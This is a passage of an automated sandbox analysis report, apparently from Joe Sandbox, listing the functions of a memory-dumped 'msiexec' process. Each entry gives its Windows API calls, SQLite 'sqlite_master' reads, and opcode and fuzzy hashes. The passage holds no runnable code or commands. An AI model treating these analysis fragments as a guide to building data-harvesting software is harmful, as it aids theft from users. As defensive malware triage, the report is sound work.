                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: sqlite_master
                                                                                                    • API String ID: 438689982-3163232059
                                                                                                    • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                    • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                    Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3917621476-0
                                                                                                    • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                    • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                    Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 822687973-0
                                                                                                    • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                    • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                    Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2605342592-0
                                                                                                    • Opcode ID: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                    • Opcode Fuzzy Hash: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                    Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                    • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2678498856-0
                                                                                                    • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                    • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                    Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Item
                                                                                                    • String ID:
                                                                                                    • API String ID: 3888421826-0
                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                    Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3727323765-0
                                                                                                    • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                    • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                    Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                    • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                    • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                    Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                    • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                    Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                    • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                    Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$CloseHandle
                                                                                                    • String ID: General
                                                                                                    • API String ID: 3722638380-26480598
                                                                                                    • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                    • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                    Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 764393265-0
                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                    Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                    • String ID:
                                                                                                    • API String ID: 979780441-0
                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                    Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                    • String ID:
                                                                                                    • API String ID: 1386444988-0
                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                    Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(046E0048), ref: 0044DF01
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02E37548), ref: 0044DF11
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02E37D58), ref: 0044DF21
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02E37950), ref: 0044DF31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                    Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                    • String ID: d=E
                                                                                                    • API String ID: 909852535-3703654223
                                                                                                    • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                    • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                    Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
